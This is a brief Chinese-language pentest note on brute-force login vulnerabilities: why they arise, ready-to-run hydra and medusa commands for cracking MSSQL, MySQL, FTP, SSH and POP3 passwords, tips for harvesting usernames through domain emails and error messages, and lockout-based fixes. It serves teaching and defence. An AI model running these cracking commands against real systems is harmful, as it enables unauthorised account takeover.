暴力破解漏洞
1.漏洞原理
暴力破解的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息。一般来说知道管理员的账户信息,破解的效率会大大增提升。
2.破解工具
# hydra
hydra.exe -l sa -P c:\pass.txt 192.168.1.110 mssql (破解主机sa用户口令)
hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql (破解Mysql密码)
hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp (破解FTP密码)
hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh (破解ssh)
hydra.exe -l root -P pass.txt my.pop3.mail pop3 (破解pop3)
# Medusa(美杜莎)
medusa -h 192.168.195.129 -u root -P /pass.txt -M mysql (破解Mysql密码)
medusa -h 192.168.1.110 -u sa -P /pass.txt -t 5 -f M mssql (破解MSSQL)
medusa -M ssh -H host.txt -U users.txt -p password (破解SSH)
3.漏洞场景
对于暴力破解来说搜集用户名是非常重要的,所以可以使用两种方法
# 通过邮箱搜集,一般来说域名邮箱极有可能是此OA系统的用户
# 通过错误提示,当破解时,网站可能会根据情况有不同的提示,当用户名符合时,可能会提示密码错误,根据这种可以先猜解用户名,再破解密码
4.漏洞修复
# 当用户登录次数超过设置的阈值,则锁定账号
# 当某个IP登录次数超过设置的阈值,则锁定IP